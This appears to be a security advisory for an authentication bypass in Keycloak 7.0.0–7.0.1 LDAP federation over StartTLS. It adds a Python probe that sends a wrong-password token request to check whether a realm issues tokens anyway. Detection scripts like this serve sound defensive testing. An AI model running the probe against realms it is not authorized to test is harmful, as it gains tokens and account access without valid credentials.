A vulnerability was found in Keycloak 7.x. When Keycloak is configured with LDAP user federation and the connection to the LDAP server uses StartTLS rather than LDAPS (SSL/TLS on a dedicated port), user authentication succeeds even when an invalid password is entered: the federated login does not actually fail on a wrong credential, so the LDAP-backed realm is effectively open to anyone who knows a valid username.
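The description above is the whole of what the advisory says about the bug, so the most useful thing to add is a way to check whether a given deployment is affected. The following is an added example, not Keycloak's own code or anything from the advisory: it sends a Resource Owner Password Credentials request to the realm's OpenID Connect token endpoint (the `/auth/realms/<realm>/protocol/openid-connect/token` path used by Keycloak 7.x) with a deliberately wrong password for an LDAP-federated user, and classifies the response. A correctly behaving realm answers `401` with `error=invalid_grant`; a realm hit by this bug answers `200` with tokens. The base URL, realm name, client ID and username are assumptions for illustration, and the client is assumed to be a public client with Direct Access Grants enabled.

```python
"""Probe whether a Keycloak realm backed by LDAP accepts a wrong password.

Added example, not Keycloak's own code.  It exercises the password grant
against the realm's token endpoint with a deliberately wrong password and
reports whether the server rejected it.  All deployment parameters below
are assumptions; replace them with values for the realm under test.
"""
import json
import urllib.error
import urllib.parse
import urllib.request

# Assumed test parameters (hypothetical deployment, not from the advisory).
KEYCLOAK_BASE = "https://keycloak.example.internal/auth"  # 7.x default context path
REALM = "corp"
CLIENT_ID = "ldap-probe"       # public client with Direct Access Grants enabled
USERNAME = "ldap-user"         # a user federated from the StartTLS LDAP provider
WRONG_PASSWORD = "definitely-not-the-real-password"


def token_request(base_url, realm, client_id, username, password, timeout=10):
    """POST a password grant to the token endpoint; return (status, json body)."""
    url = f"{base_url}/realms/{realm}/protocol/openid-connect/token"
    form = urllib.parse.urlencode({
        "grant_type": "password",
        "client_id": client_id,
        "username": username,
        "password": password,
    }).encode()
    req = urllib.request.Request(url, data=form, method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, json.loads(resp.read().decode())
    except urllib.error.HTTPError as err:
        # Keycloak returns error details as JSON on 4xx responses.
        try:
            body = json.loads(err.read().decode())
        except ValueError:
            body = {}
        return err.code, body


def classify(status, body):
    """Turn a token-endpoint response to the wrong-password probe into a verdict.

    VULNERABLE:   tokens were issued for a password that is known to be wrong.
    REJECTED:     the expected 401 invalid_grant came back.
    INCONCLUSIVE: anything else (client misconfigured, unknown user, etc.);
                  the probe did not reach the credential check, so fix the
                  setup before drawing a conclusion.
    """
    if status == 200 and "access_token" in body:
        return "VULNERABLE"
    if status == 401 and body.get("error") == "invalid_grant":
        return "REJECTED"
    return "INCONCLUSIVE"


def probe(base_url=KEYCLOAK_BASE, realm=REALM, client_id=CLIENT_ID,
          username=USERNAME, password=WRONG_PASSWORD):
    """Run the wrong-password probe against a live realm and return the verdict."""
    status, body = token_request(base_url, realm, client_id, username, password)
    return classify(status, body)


if __name__ == "__main__":
    # Network call; only runs when executed directly, not on import.
    print(probe())
```

Run it once with the wrong password as above; a `VULNERABLE` verdict means the realm issued tokens without a valid credential. Because the advisory ties the bug specifically to the StartTLS path, re-running the same probe after the federation provider's connection URL has been switched to `ldaps://` (with StartTLS disabled) shows whether that change restores the expected `REJECTED` result. An `INCONCLUSIVE` verdict usually means the client does not allow direct access grants or the username is not federated, not that the server is safe.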
References: GSA_kwCzR0hTQS1qZjg2LTk0MzQtZjhjMs4AAi3L
Keycloak Authentication Error
Affected Packages | Affected Versions | Fixed Versions
---|---|---
maven:org.keycloak:keycloak-parent | >= 7.0.0, <= 7.0.1 | No known fixed version

Affected Version Ranges: all affected versions are 7.0.0 and 7.0.1.